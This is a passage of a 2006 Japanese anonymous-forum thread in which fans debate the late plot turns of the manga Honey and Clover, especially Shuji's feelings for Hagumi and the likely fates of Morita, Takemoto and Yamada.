…という、「 読 者 を ナ メ て る か ? 」としか言いようのない仕打ちを次々と…。
上記黒丸2点に関しては、「作者が声優・役者萌したせいで修司への思い入れが異常に強くなった為の暴挙」
と捉えられても本気で仕方がないとオモ。作者の脳内補完っぷりが凄まじすぎる。

290 :花と名無しさん:2006/07/13(木) 21:59:37 ID:???0
>>288
ちょwそれどんなサスペンスww

291 :花と名無しさん:2006/07/13(木) 22:04:04 ID:???0
>>299
>「修司に迷惑かけ続けるコト」が全肯定

自分も、コレは無いよなぁ・・・と思っていた。
「はぐは天才だから」で片付けるんなら、
1巻から何の進展があったというんだ。

292 :291:2006/07/13(木) 22:05:44 ID:???0
ごめwアンカ間違えた

× >>299
○ >>289

293 :花と名無しさん:2006/07/13(木) 22:10:43 ID:???0

>289
こうみてみると、ハグ関連て結構様々な要素が絡んでたんだな。


というか竹本のこのスレでの呼び名は「たけのこ」で定着しつつあるのかw

294 :花と名無しさん:2006/07/13(木) 22:12:50 ID:Jif9gbTo0
>>273
こんなところでシロップを拝めるとは…



295 :花と名無しさん:2006/07/13(木) 22:21:27 ID:???0
>>289
自分もa-1、b−1、c−1あたりが有力かと踏んでたんだが・・・。

卒業後、招待されてた外国の美術院に留学。
で、寄宿舎とかに入って自立した生活をスタートさせる。
今はまだ余裕無いけど、いつかまた森田と巡り合い・・・みたいなね。

296 :花と名無しさん:2006/07/13(木) 22:28:30 ID:???0
とにかくはぐと修司の親子的依存関係をなんとかしてからじゃないと
恋愛とか持ち出されてもキ(゚д゚)モ-なだけなんだよなぁ



297 :花と名無しさん:2006/07/13(木) 22:29:32 ID:IJe8CQQt0
「100年たっても生き続けられるものを作れるんだぞ、アイツは」(だっけ?)と森田に言わせているから、
ラストは何十年後の美術館で(←それもリカ真山の絡んでいる)二人(はぐと森田)の作品が向かい合っているラストなのかなあと思ったりして・・・。

298 :花と名無しさん:2006/07/13(木) 22:31:37 ID:???O
君かわりに漫画かきなさい

299 :花と名無しさん:2006/07/13(木) 22:37:53 ID:???0
>>297
そのラストは綺麗だねぇ
今となっては幻でしかないけれど・・・

300 :花と名無しさん:2006/07/13(木) 22:39:34 ID:???0
>>297のラストは、はぐと森田は結ばれないけど
芸術作品は結ばれた(=心は結ばれた)

みたいな終わり方だから
はぐが臭と結ばれても成り立つよね…。




301 :花と名無しさん:2006/07/13(木) 22:41:51 ID:???O
襲やだ

302 :花と名無しさん:2006/07/13(木) 22:44:40 ID:???0
作者が萌え狂ってるんだから仕方ない

303 :花と名無しさん:2006/07/13(木) 22:46:11 ID:???O
(゜´Д`゜)

304 :花と名無しさん:2006/07/13(木) 22:46:19 ID:xj22wfr5O
これ山田さんの美乳かなhttp://s.pic.to/2e4c1

305 :花と名無しさん:2006/07/13(木) 22:47:08 ID:???O
>>297のラストは美しいけど切ない!!!!
ずっと森田はぐを応援し続けてきたのに…orz

306 :花と名無しさん:2006/07/13(木) 22:48:44 ID:???O
自分もだ

307 :花と名無しさん:2006/07/13(木) 22:49:29 ID:???0
>>297
感動した
すごい感動した

308 :花と名無しさん:2006/07/13(木) 22:52:32 ID:???0
へえウミノってヒロシ萌えだったんだ。
自分もヒロシ好きだが修には合わないと不満だった。
ウミノたんととことん嗜好合わないなw

309 :花と名無しさん:2006/07/13(木) 22:54:21 ID:???O
ヒロシってしんちゃんの人?

310 :花と名無しさん:2006/07/13(木) 22:55:37 ID:???0
ヒロシもかもしらんが、決定打は堺○人だよ

311 :花と名無しさん:2006/07/13(木) 23:02:31 ID:???0
ヒロシだったらそのまま保護者ルートの方が強いんじゃない?
顔の堺化とこの展開が同時期だけに「元々考えていた」がうそ臭くて仕方ない。

312 :花と名無しさん:2006/07/13(木) 23:02:48 ID:???0
>>308
>自分もヒロシ好きだが修には合わないと不満だった
奇遇だね。自分もだよw
つかこの方のお声で「好きさ大好きry」演られても
ギャグにしかならなそうな。

ってスレ違いかね そろそろ失礼

313 :花と名無しさん:2006/07/13(木) 23:04:12 ID:N0DT4KtV0
真面目な話、はぐって初潮来てるの?
修の子供産めるの?

314 :花と名無しさん:2006/07/13(木) 23:04:44 ID:???0
ageちゃった、すまん

315 :花と名無しさん:2006/07/13(木) 23:05:58 ID:???0
どうせなら性交まで描ききれよ

316 :花と名無しさん:2006/07/13(木) 23:09:16 ID:???0
>>313
20才過ぎてるのに来てなかったら病院逝かなくちゃな

317 :花と名無しさん:2006/07/13(木) 23:11:29 ID:???0
よく初めからこの展開は決めていたという作者はいるが結局それを
読者に納得させられないならただの描写不足なんだよな

318 :花と名無しさん:2006/07/13(木) 23:14:57 ID:???0
>>317
同意。
エンターテイメントとして失敗してるよな。

319 :花と名無しさん:2006/07/13(木) 23:19:40 ID:???O
そうそう。
決めてたからどうなの?それで?って感じ。
しっかり話がかみあってんなら別だけど。

320 :花と名無しさん:2006/07/13(木) 23:20:46 ID:???0
はぐは東京の大学に来て恋や仕事や創作に頑張ってる仲間を見てきたけど
何にも変わらなかったんだね。
子供の頃から死ぬまで修ちゃんがいてくれれば全部OKなのか。

321 :花と名無しさん:2006/07/13(木) 23:28:18 ID:???0
そーか
作品の上で森田とコラボってオチはありかもな
あくまで芸術才能の上での結婚と

322 :花と名無しさん:2006/07/14(金) 00:08:34 ID:???0
スポンサーよいしょも大概に…

323 :花と名無しさん:2006/07/14(金) 00:33:40 ID:???0
でも共同制作ってことははぐと森田は制作期間心身ともにすごく近づくよね
それに修がGOサインを出せるのって修とはぐの関係が
揺るぎないものになってからじゃないと無理だろうな

324 :花と名無しさん:2006/07/14(金) 00:34:21 ID:???0
9巻は60話まで入ってたね。
コミック派の人に「このまま森田エンドなんだな」って思わせるための罠みたいだ。
そんで最終巻でどんでん返しが。
こういうのはちゃんと計算の上なんだろうか。

325 :花と名無しさん:2006/07/14(金) 00:37:04 ID:???0
>>324
抱き合ったところで終わりか

10巻は人生下さいでスタートか orz

326 :花と名無しさん:2006/07/14(金) 00:41:42 ID:???O
297 イイ!そんな終わり方してくれるなら今の展開をどうにか許せてしまえそうなくらいだ…wところでふと思ったんだけど、森田さんて皆で表紙になる時、一人で離れた所に居たり一人背中向けてる事多いよね・・何故か297見て思い出した・・

327 :花と名無しさん:2006/07/14(金) 00:51:50 ID:???0
>>326
アンカーつけようよ
改行しようよ

328 :花と名無しさん:2006/07/14(金) 01:05:13 ID:???0
>>327
携帯だもんw


329 :花と名無しさん:2006/07/14(金) 01:05:43 ID:???0
>>297 イイ!
そんな終わり方してくれるなら
今の展開をどうにか許せてしまえそうなくらいだ…w
ところでふと思ったんだけど、森田さんて皆で表紙になる時、
一人で離れた所に居たり一人背中向けてる事多いよね・・
何故か>>297見て思い出した・・


330 :花と名無しさん:2006/07/14(金) 01:07:58 ID:???0
代行してやったぞw

331 :花と名無しさん:2006/07/14(金) 01:27:59 ID:???0
328からはなんとなくはぐと同じ臭いを感じる

332 :花と名無しさん:2006/07/14(金) 01:37:11 ID:???0
今度の映画では、はぐはちゃんと修のいとこの娘なんだね。
…これが修はぐエンドの伏線か

333 :花と名無しさん:2006/07/14(金) 01:41:23 ID:???0
あれ、映画は姪になっていたから問題になっているんじゃないの?

334 :花と名無しさん:2006/07/14(金) 01:43:34 ID:???0
さっきテレビで宣伝してたけど、修がはぐを「いとこの娘」って紹介してた。

335 :花と名無しさん:2006/07/14(金) 01:47:07 ID:???0
結局どっちなんだろうね。
映画は見ないからどうでもいいけど

336 :花と名無しさん:2006/07/14(金) 01:49:37 ID:???0
へーもしかして撮り直したとか?
公式サイト上では未だに姪と書いてある。
単純に初期段階で混同していたのか?

337 :花と名無しさん:2006/07/14(金) 02:18:02 ID:???0
映画スタッフも制作開始当初はまさか修はぐエンドになるなんて
ミジンコほども思ってなかったんだろうな・・・って感じの認識度の低さだな>姪orいとこ設定

338 :花と名無しさん:2006/07/14(金) 04:21:11 ID:Zruw3scR0
流れ読まずにコミックスの質問なんだけど、
はぐみ実父が病院に来たところがよくわかんない。

実父は全て修司に任せたってのは分かるんだけど。

>彼女の帰れるはずの場所が もはや
>姿を変えて しまった事……

ってのはどういう事?
実父ははぐみ溺愛してたんだよね?

339 :花と名無しさん:2006/07/14(金) 04:21:43 ID:???0
sage忘れました…ごめんなさい。

340 :花と名無しさん:2006/07/14(金) 06:43:43 ID:???0
みなさんボロカスですな。わたしゃ相変わらずハチクロ大好きだし、展開も得心いってるよ。
修ちゃんの境目ははぐの入院でしょう。少なくとも竹本帰還の段階ではまだ保護者の目ですしね。

竹本や森田でははぐと一緒の歩幅で歩いていくことは出来ない。それは十分今までのエピソードで語られてたように思うんだが…
だいたいからして森田とはぐが手を取り合って末永く幸せに暮らしましたとさメデタシメデタシ
という展開のほうがよほどリアリティを感じんのだがなーそうゆう意見は少数派か。

森田スキーにとってこれが慰めになるのかどうかは分からんけど、修ちゃんが宣言したからといって
森田とはぐの関係に何の揺らぎもないよ。彼らはこれからも作品を通して触れ合い、心を通わせていく。
修ちゃんはそれも含めて承知の上でぶっちゃけたんだから。



341 :花と名無しさん:2006/07/14(金) 06:52:52 ID:???0
ところで山田さんの処遇だが、山田×野宮でしゅーりょーってのが主流派なんすかね。
個人的にそれはナイと思ってるんだが。

野宮の山田さんへの関わり方は雨ざらしの捨て猫に同情してしまったような話で、
根本のところで山田さんを欲してるわけじゃないんだよね。
可哀想すぎてほっとけない。お前の居場所はそこじゃない(だけど、自分のとこでもない)。
ただし餌付けだけして放置したんじゃ真山と同列になっちゃうから、全力でぶつかって全力で振る。
それが野宮の生き様なんじゃあないかと。

山田さんは真山に優しくされたまま、まともに失恋させてもらえないでいる。それが、山田さんが前に進めない一番の理由。
都合がいいキャラっていえばそうだが、野宮はその役割を真山から奪い取って実行するためにいるんだと思ってるんだが。

あゆは野宮に振られ、誰とも結ばれずエンディング。それでいいと思う。
伏兵で一平兄ちゃん、大穴で森田さんって可能性も0ではないとは思うけどさw。

342 :花と名無しさん:2006/07/14(金) 06:52:59 ID:???0
>>338
>彼女の帰れるはずの場所が もはや
>姿を変えて しまった事……

はぐは、卒業後の進路を
・このまま都会で創作活動(※ 修 ち ゃ ん 必 須 ト イウコトニナッテイル)
・田舎に引っ込み創作活動
のどちらにするか(4年生になってから)ずっと迷っていた描写がある。

本心では、前者を採りたいと思ってはいるのだが、
修に迷惑をかけ続けることを(今更…でもないか)気に病み、
後者の選択肢を「第一志望」と、していた。
自分のお家でのんびり生活しながらそこそこの創作活動。
それでも、いいじゃん・・・と。

しかしここにきて実家の状況が変わった。>はぐ父が後妻を娶る

後妻を迎え入れるとなると、色々と気を使わなきゃいけないことが出てくるし
なにより身内が芸術活動に理解がないと上手くやっていくのは難しい。

つまり
「帰る場所が(今まで通り)、娘溺愛で放任主義の父がいるだけの場所であったなら
実家に帰って創作活動するのに気兼ねが無かったのに・・・どうすんべ(゚Д゚;)」
ということを言いたかったんでないかな。

343 :花と名無しさん:2006/07/14(金) 07:02:56 ID:???0
>>340

おお。今のこのスレにも同士がいたとは。
物語の内容配分に少々難があったことが、
ここにきて急激に感じられるようになってしまったことについては残念だけど 
展開としては十分納得できるものだと思っている。

>境目ははぐ入院
これも同意。
ただ、自分的にはバカ親子漫才を繰り広げる2人が好きだっただけに
ちょっとつらいがね。

344 :花と名無しさん:2006/07/14(金) 07:06:08 ID:???0
修の恋愛感情の芽生えは
ミステリ小説でラスト3ページで新キャラが出てきて
コイツが真犯人でしたという話に似たようなものを感じるよ

要は物語にはある程度の伏線が必要ということです
ミスリードさそう伏線ももちろん面白いけど
正解を導き出せる伏線もきちんと張ってくれないと
読者は真相ルートを明かされたときポカーンとなってしまうわけですよ

盲目的にその作品を愛し与えられたものを
脳内で上手く変換解釈できる人はそれでも平気だろうけど
そういった不親切な作りの話にどうしても違和感感じる人は沢山います

問題なのは森田が犯人じゃなかったということじゃなく
修が犯人だという伏線が9巻以前に読者にそれとわかる感じで描かれなかったことなんですよ

345 :花と名無しさん:2006/07/14(金) 07:13:28 ID:???0
>>344
まあ難しいところだ。
確かに森田は犯人かもしれないという匂わせ方はしていたが(竹本くんは可哀想だが最初から除外だw)
竹本も森田もあり得ないという積み重ねはしていたと思うよ。

というか、ミステリを例えに出すと、一番身近にいて誰からも疑われていなかった人物が
実は犯人だったと言う王道展開に類似してしまう気もするがw。
少なくとも、手順はともかくとして結果には矛盾はないように思う。

346 :花と名無しさん:2006/07/14(金) 07:15:04 ID:???0
>>341
>山田さんは真山に優しくされたまま、まともに失恋させてもらえないでいる。
>それが、山田さんが前に進めない一番の理由。

失恋させてもらえないって、いくらなんでも今の真山とリカを見たら
普通なら、踏ん切りつけるだろーさ。
山田が前に進めないのは、山田自身が悪いんだよ。

347 :花と名無しさん:2006/07/14(金) 07:16:49 ID:???0

修の恋愛感情発覚といっても、
森田、竹本のケースのような
はぐとの間の相互方向的なものではないようだし(今の段階では)、
「最後でドッキリ狙ってみました」というスタンスでも
許される範囲ではあるとは思う。

ただなんつーかちょっと悪趣味。

348 :花と名無しさん:2006/07/14(金) 07:18:20 ID:???0
朝から熱いなおまいら

349 :花と名無しさん:2006/07/14(金) 07:22:31 ID:???0
>>346
うん、山田さんが一番悪い。つーか大学入るまでまともに恋をした事がなかったというのもどうかとは思うわねw。
だから結末としては、山田さんは(この物語の中では)幸せになれない。でも、ようやく前を向いて歩けるようになる。
という終わり方が相応しいかなと。

というか、森田とはぐをくっつけなかったウミノ先生が、野宮と山田をすんなりくっつけるとはまったく思えんかったりねw。

350 :花と名無しさん:2006/07/14(金) 07:31:16 ID:???0
>>342
実家に父親がいるとことか
親子一緒にいる場面とか会話とか
そういうのを一切描かないで
居場所としての実家を失ったみたいにされてもなぁ。
だいたい父親はあの家に住んでないんでしょ?

351 :花と名無しさん:2006/07/14(金) 07:38:25 ID:???0
居場所としての、っつーか
のびのび気兼ねなく創作活動できるアトリエとしての、ってトコだろうw

はぐは意外としたたかな奴だ。

352 :花と名無しさん:2006/07/14(金) 07:59:33 ID:???0
「最終的にモリタとくっつくッポイ」度合いの単位をモリタポとあらわそう。
今のところ50モリタポかな。
いくらなんでもこのまま終わらせるとは思えない。

353 :花と名無しさん:2006/07/14(金) 08:11:05 ID:???0
森田とはぐがっくっつくとはもう思ってないけど
森田の中で一生忘れなれない女的な存在にはなるだろうなと思う

354 :花と名無しさん:2006/07/14(金) 08:16:19 ID:???0
>>353
それだけはやめてほしい。
やっと父親関係の過去から開放されたのに、
これからもそれじゃあ森田は過去にしばられまくりのかわいそうな人になっちゃうよ。。


355 :花と名無しさん:2006/07/14(金) 08:38:06 ID:???0
数年後

部屋で油絵を描くはぐみ。
手はほどんど元通りに動くようになったものの、まだ完全には直っていず
ちょっと力を込めた瞬間に筆を落としてしまう。
「ぁ」
しばらく半泣きで右手をみつめていたが、
そばに転がっているはぐノートの視線を移してちょっと微笑んでから
「・・・・よーし、がんばる!フンッ」

台所から「はぐーごはんだよー」と修の声。
「はーい」パタパタパタ(走ってく音)

風でめくれるはぐノートの中には、新聞や雑誌から切り抜いた森田の活躍のニュース達。

〜END〜

こんなもんか?

356 :花と名無しさん:2006/07/14(金) 08:46:47 ID:???O
今日コンビニ寄ったら9巻があったから買ったけど…
何この欝展開('A`)

真山の存在が浮きまくりだしw

357 :花と名無しさん:2006/07/14(金) 09:00:49 ID:???0
>>354
親父さんのは悲劇だから呪縛になったけど
はぐと綺麗に別れたらいい思い出として残るんじゃないの?
現状は綺麗に別れられてないけどそのフォローがラストにあるなら
森田の中ではぐが青春時代の象徴的に残るのは
今までの積み重ねを考えるとそんなに嫌じゃないな

358 :花と名無しさん:2006/07/14(金) 09:10:27 ID:???0
妙に美化してはぐを覚えてそうだな

359 :花と名無しさん:2006/07/14(金) 09:14:51 ID:???0
どのキャラも基本的に恋愛に関して粘着質すぎて、
ノスタルジックというよりうんざりげっそり気持ち悪い。
ふられてるのに・・別れてるのに・・
真剣さを、気持ちをだらだら引きずることでしか表現できないところが陳腐なんだよ。
もっと前向きになれんのか、この作者。
はぐ父をみろ。妻の死にも母の死にも溺愛娘への仕打ちにも
たいして引きずることもなく、さっさと新しい家族との生活を作ってしまった
はぐ父を。

360 :花と名無しさん:2006/07/14(金) 09:18:55 ID:???0
それが売りな漫画なんでそこが合わないならどうしようもないやな
カラっとした作風が好みならそういうの読めばいいと思うよ
ハチクロは粘着を楽しめる人用漫画
粘着過ぎて脱落者多数だけど

361 :花と名無しさん:2006/07/14(金) 09:27:59 ID:???0
9巻には「臭×はぐ」部分は入らないんだな。
汚いなぁ。
コミックス派の人には9巻読んで
「もうハチクロは売るぞ! キー。
 次の巻は買わないぞ!」
ってならないだろう。

コミックス派の人は最後まで買ってしまうという計算か…。

10巻はいつ出るんだろ…。
半年後くらいか…??


362 :花と名無しさん:2006/07/14(金) 09:28:51 ID:???0
9巻買った人、何話分入ってたかと
読みきりとか描きおろしとかはどうだったかとか
教えてください。

363 :花と名無しさん:2006/07/14(金) 09:36:00 ID:???O
>>362
54話〜60話まで
書き下ろしはなし
いつもの後書きと空きページにカットが入る程度

364 :花と名無しさん:2006/07/14(金) 09:39:01 ID:???0
>353 ちょwwモリタポ違いかw  自分的には、
40モリタポ,7タケモポ,3ハナモポ(修),50その他 てことで。

そもそも今回の「人生ください」一過は、
「はぐの、自分の芸術人生への向き合い方」に決着をつけました、って話。

「私は描き続けたい」という結論を出し
「一緒に戦ってくれる」修司とこれからを共にするという選択は
今まで(印象は薄いけど)さんざん描かれてきた彼女の思考原理からいっても至極妥当。
そこにいわゆる「恋情」ってやつは関わってきていない。
はぐは修に対し「親愛」めいた感情はあるようだがそれ優先でもない。
あくまで根底にあるのは「絵を描き続けたい」という強い想い。

その辺を取り違えて、一番間違った方向にヒートアップしてしまったのが竹本。(森田は最終的に直感で理解)
「どうしてはぐちゃんに“俺を選べ”って言わないんすか?
俺は振り向いてもらえないの覚悟で、ちゃんと言いましたよ?」
竹本にそう言われ、意味有り気な沈黙を残したその時の修司の胸中としては
「今は、自分のエゴ(恋情,愛情)の押し付け合戦をやってる時じゃないんだよ」
てトコロだろう。その辺に関して修は以前からナイーブな面を見せていた。

そして一段落後、修がふざけて“「はぐは返さん!w」というギャグ”で締めようと思ったら
森田に一本取られ、ギャグのつもりが 実 は 半 分 本 気 で し た (禁断の?恋心をはぐに対して抱いている)
ってことが公衆の面前で晒されることになってしまった、というギャグの多重構造。

まだまだはぐの恋の行く末は決まらんよw

365 :花と名無しさん:2006/07/14(金) 09:41:58 ID:EtQoMiz10
7巻はたけのこの巻、8巻は真山の巻
9巻は(まだ読んでないけど)森田の巻つー感じだね

すると10巻は臭の(ry

366 :花と名無しさん:2006/07/14(金) 09:45:48 ID:???0
きんもーっ

367 :花と名無しさん:2006/07/14(金) 09:50:23 ID:???0
>>364
作中の人物への説明としては別にそれでいいと思うけど、
読者への説明はそれじゃ足りないんじゃね。

読者はいわば神の視点から見てるのに、
その神の視点すら誤魔化した本音は時にインパクト効果抜群だけど、
反面その必然性がないと単なる説明不足と受け取られても仕方がない。

これから修の気持ちの不足分描こうにも
もうすぐ連載終わるみたいだし、
どっちにしろ未消化感は否めない。

368 :花と名無しさん:2006/07/14(金) 09:51:42 ID:???0
昔はぐと森田が結婚したらさぞ生活能力のない夫婦になるだろうなー
なんて妄想したのが嘘みたいです…

369 :花と名無しさん:2006/07/14(金) 09:59:53 ID:???0
ウワサになってるし帯にすごいマンガとかあるから
見たらなに?このきったねー絵。巻末のオマケマンガとか
電波ゆんゆんだし。占い好きです?お前は女子中高校生か?
作者紹介なんてどうでもいいのにキャラ作りすぎだろ。
しかも見開きの最近の作者のコメント。
魔法?え?精神病院へいったほうがいいですよ。

スレと関係ないんだけど昨日吉田輝美のラジオでピーコが
坂下塵子をクソミソに叩いててガクブルした。




370 :花と名無しさん:2006/07/14(金) 10:02:19 ID:???0
(気に入ったキャラがいる人は)凄い(感情移入できる)漫画ですよ?
 
まあそれも最後にひっくり返った訳だが。

371 :花と名無しさん:2006/07/14(金) 10:07:36 ID:???0
森田好きだったけど感情移入は全然してなかったよ
みんな思考が謎過ぎてせいぜいたけのこぐらいだ感情移入できるの

372 :367:2006/07/14(金) 10:08:19 ID:???0
>>364
>読者はいわば神の視点から見てるのに、
>その神の視点すら誤魔化した本音は時にインパクト効果抜群だけど、
>反面その必然性がないと単なる説明不足と受け取られても仕方がない。

これは自分もそう思ったなぁ。
インパクトを狙ったにしても、それを上回るネガティブイメージ(※)が生じてしまうことを
作者は予想できなかったのか?って。

(※極端な話「保護者」イメージから「ロリコン?」イメージへ)

「作者は本編で説明する気はさらさらないんだな」と諦めてる。>修の気持ち
所詮インパクト狙いの、「ラスト近くで主人公への横恋慕発覚」な脇役だしなぁ…。

(つか作者がマジで役者萌えしてて、深く理由とか考えてないんじゃねーの)
とか思えてきたりもしてw

373 :花と名無しさん:2006/07/14(金) 10:09:05 ID:???0
たしかに塵子きらいだったけどピーコも好きじゃないからなあ。
塵子はきらいなんだけど塵子をメタクソにいってる人も
きらいな人ばっかなんだよね。リンカもピーコも前からきらいだったし。
なんか、同属(似たようなキラワレもの)同士で叩きあってるって感じ?
大体、何股もしてるの塵子だけじゃないっしょ。
たまたま発覚してピーコみたいなオカマにいいふらされるわ、
運が悪かったね〜塵子。


374 :花と名無しさん:2006/07/14(金) 10:09:58 ID:???0
評判の半分は電通の広告パワーって感じだが。

375 :花と名無しさん:2006/07/14(金) 10:10:19 ID:???0
>>373
ハチクロになんか関係あるの?

376 :花と名無しさん:2006/07/14(金) 10:21:05 ID:GizQrH8EO
竹本と山田に感情移入すると非常に痛い気分になる

377 :花と名無しさん:2006/07/14(金) 10:22:25 ID:???0
山田はまだ野宮が両手広げて待ってるからフォローあっていいよね
たけのこは死して屍拾うものなし

378 :372=364:2006/07/14(金) 10:24:25 ID:???0
すまん色々と間違えたorz 
367を名乗ってしまいスイマソン
そして
>>372のカキコは
>>364へでなく >>367へ向けてのモノですた


379 :花と名無しさん:2006/07/14(金) 10:26:10 ID:???0
>>377
たけのこは宮大工のみなさんが待っててくれてますよ?

380 :花と名無しさん:2006/07/14(金) 10:26:15 ID:???0
はぐが芸術活動を続けていくために修を選ぶのはわかるし、
それに修がつきあっていくこともわかる。
でもやっぱり修からはぐへの恋愛感情があったってことがわからない。
今まで読んできて修ははぐに対して、親子愛、家族愛的な気持ちを持っていると
読み取らせる描写がほとんどで、それが恋愛感情に変わったのはいつかわからんし、
また恋愛にする必要も今のところ感じられない。
むしろネガティブなイメージを持つ人のほうが多いと思う。
はじめからこの展開が予定されていたなら説明不足だし、
予定変更してこの展開なら強引すぎとしか思えない。

381 :花と名無しさん:2006/07/14(金) 10:29:00 ID:???0
でも竹本が一番リアルの大学生に近いという罠。
まだ先の目標が決まっただけマシかもしれない。
浜美には就職も厳しいし目標も無いその他学生が大勢いると思われ。
 
というか竹本は誰ともどうにもならないってオチは、実は最初から考えていたのかもしれない。
だから竹本視点での思い出話みたいな描写が良く出てくるのでは。
誰かとくっついていたらあんな語り口にはならないかと。

382 :花と名無しさん:2006/07/14(金) 10:30:25 ID:???0
>>379
ウホッ

383 :花と名無しさん:2006/07/14(金) 10:31:52 ID:???0
ラストに用意したドッキリも、やり方間違うと大不評喰らう、の良い例

一気にしょっぱくなっちゃった

384 :花と名無しさん:2006/07/14(金) 10:34:46 ID:???0
竹本ははぐ本人に関しては基本的にずっと蚊帳の外だったから
竹本が失恋するのは別に変だとは思わない

はぐの心の壁の内側に入るには幼少期から見守り続けたとか
才能同士で引き合うとかそういう特殊なパスポートが必要で
竹本は凡人故にそれも手にすることはなかったみたいな感じがする

恋愛じゃないけど原田夫妻の絆に修が入れなかったように
竹本はあくまで外から見てる人だよな

385 :花と名無しさん:2006/07/14(金) 10:42:37 ID:???0
>>384
“特殊なパスポート”かぁ。悲しくも良い喩えだね

それでも
「あげられるものなんて 心くらいしかないから 君にわたそうと思った」
この竹本のポエム?は(ハティクロ)名言集の中に入る(と自分は思っている)よ





386 :花と名無しさん:2006/07/14(金) 10:45:29 ID:???0
ポジション的にも外見的にも性格的にも竹本と昔の修はほぼ重なっている。
と言うよりも、旧青春三人衆は森田はぐ竹本の構図を意識して作ってあるんだろ。
理花は事故に遭うまでは冷静はぐとでも言うべき天然系天才だったし。
三人の幻影は今の主役達の青春を引き立たせる鏡なんでしょ。

387 :花と名無しさん:2006/07/14(金) 10:49:03 ID:???O
本当にあと2回で終わるの?

388 :花と名無しさん:2006/07/14(金) 10:50:03 ID:???0
下手すると一回じゃない?

389 :花と名無しさん:2006/07/14(金) 10:53:02 ID:???0
竹本と森田が最終回で親戚の幼女の世話をしだしたりしないことを祈る

390 :花と名無しさん:2006/07/14(金) 10:53:42 ID:???0
>>386
それは思った。
修司→竹本
原田→森田
理花→はぐみ
と重なってて天才二人と付き合いつつも、
その間に自分には越えられない壁を感じる凡人という構図が繰り返されてるね。
でもこの構図だと旧三人衆における修以上に竹本は蚊帳の外だし、
同じような構図だからって修が何かをしてやったわけでもないので
あんまり上手くいかされていないような気がする。

391 :花と名無しさん:2006/07/14(金) 10:59:10 ID:9G9YDWJ80
年令=彼女いない暦の俺がきましたよ

392 :花と名無しさん:2006/07/14(金) 11:00:07 ID:???0
>>386
旧と新は三人の核になる存在が女か男かってことで結構な違いがあるね
女を挟んだせいで男同士で表面化しなくても対立関係が生まれてる
旧三人組の修の場合は疎外感はあったかもしれないけど
リカと性別が違うことで原田に対するポジションが重複するのを避けられたけど
新三人組は森田も竹本もはぐを同じ意味で欲しがったもんなぁ
それも結局は修にとられたから痛みわけになるのかもしれないけど

393 :花と名無しさん:2006/07/14(金) 11:00:22 ID:???0
>>387
もう描くことも残ってないような気がするし・・・。


山田関連をなんとかしてくるかな?
>>341タンの読みは結構いい線いってるんじゃないかと思った。
自分も、野宮はあゆを「ほっとけない」だけ?なのかもと時々思う。

394 :花と名無しさん:2006/07/14(金) 11:02:48 ID:???0
ほっとけないだけで青春スーツ再装着するなら
野宮もかなりのお人よしだよね
真山はマジで見る目がないということになる

395 :花と名無しさん:2006/07/14(金) 11:02:56 ID:???O
つーかここまで凡人と天才は違うのよ!を延々と繰り返され、凡人である読者に何を訴えたいのやら

396 :花と名無しさん:2006/07/14(金) 11:03:19 ID:???0
>>390
修がはぐを利用して芸術的な高見に到達しようとする、という根拠付けの方が正しいかもしれない。
あの二人の記憶があるから、はぐに自分の夢を託そうとしたと。

397 :花と名無しさん:2006/07/14(金) 11:06:44 ID:???0
>>395
同意。ちっとも共感できない。

天才を主人公やメインキャラに描くんなら
「天才だけど、こんなアフォな一面が!」
「天才だけど、恋をしたら純情人間になってしまう!」
「天才だけど、素顔はこんなに庶民的!」
みたいなキャラのほうが、凡人である私は
読んでて共感もてたり、楽しい気分で読めるよ。

398 :花と名無しさん:2006/07/14(金) 11:07:09 ID:???O
考えすぎ。飲み屋は山田にマジ惚れで山田も八巻のモノローグから奴に傾きかけてる。つもりで描いてるようみのは

399 :花と名無しさん:2006/07/14(金) 11:07:49 ID:???0
分かった。
テーマは「劣等感にまみれているけど美しい記憶」だ。
最初から負け組の物語だったんだよ。

400 :花と名無しさん:2006/07/14(金) 11:09:45 ID:???0
違うよ
劣等感を元に長期計画すれば凡人も逆転ホームラン打てますよって話だよ

401 :花と名無しさん:2006/07/14(金) 11:09:56 ID:???0
>>369
修のモノローグやら回想やらでそう描かれてるし、それであってると思うよ

402 :花と名無しさん:2006/07/14(金) 11:11:48 ID:???0
少女漫画なら天才の相手役は凡人にして読者に夢見されるのが一般的手法だけど
ハチクロは凡人ノーサンキュで門前払いだからな

403 :花と名無しさん:2006/07/14(金) 11:11:53 ID:???0
>>400
つまり、真山と修が凡人逆転ホームランだと。
 
いやまあ、合っているかな…
 
で、それで竹本はいつ打席に立つので?

404 :花と名無しさん:2006/07/14(金) 11:12:50 ID:???0
>>403
竹本の親戚の才能溢れる幼女が育つ頃

405 :花と名無しさん:2006/07/14(金) 11:14:21 ID:???0
「僕達は廻りつづける」・・・かぁ・・・(遠い目)

406 :花と名無しさん:2006/07/14(金) 11:14:23 ID:???O
海野の好きなスラダン見習えよ奴らも超人軍団だがそれでも凡人読者に希望を与える普遍的メッセージがあったよ

407 :花と名無しさん:2006/07/14(金) 11:14:25 ID:???0
なんかみんな病んできてないか…?

408 :花と名無しさん:2006/07/14(金) 11:15:42 ID:???0
でもさぁ、完全無欠の天才な森田がスルーされるって、
ある意味凄いオチではあるな。

409 :花と名無しさん:2006/07/14(金) 11:17:29 ID:???0
海外ではマンセーされてるけど
日本ではスルーされる程度の天才なんだよ>森田


410 :花と名無しさん:2006/07/14(金) 11:18:45 ID:???0
そういう訳で森田兄弟は801ちゃんの餌食になったのでした…

411 :花と名無しさん:2006/07/14(金) 11:18:49 ID:???0
森田は才能は完全無欠だけどその他が穴だらけだったからなぁ
森田に父親のしがらみがなくて竹本並と言わなくても10分の1でもいいから
人を気遣える性格だったらこのラストななかっただろうね
まぁそんな森田は森田じゃないけど

412 :花と名無しさん:2006/07/14(金) 11:21:50 ID:???0
そうだな。
そんな森田は森田じゃないな。
でも山田には結構気遣いしていたりして。
アレはむしろ女として見てないからできる技なのか。

413 :花と名無しさん:2006/07/14(金) 11:22:42 ID:???0
森田って人を気遣えないわけじゃないと思うんだよ
現に山田には優しかったしさ
ただはぐが才能以外で求めるものを森田は与えられなかっただけって感じ
はぐは恋愛においては気遣いとかそういう優しいだけの感情は特に求めてなかった気がする
だから竹本でも修でもなく森田に恋したんだろうし
はぐの中で芸術>恋愛になった時に森田ははぐの選択肢から外れたんだろうな

414 :花と名無しさん:2006/07/14(金) 11:25:54 ID:???0
森田は惚れた女には純情っぽいもんね
初デートで歩調も合わせず会話もなしってどこの厨房だよって感じだった
一目惚れの表現もちょっと変わってたしなぁ

415 :花と名無しさん:2006/07/14(金) 11:36:12 ID:???0
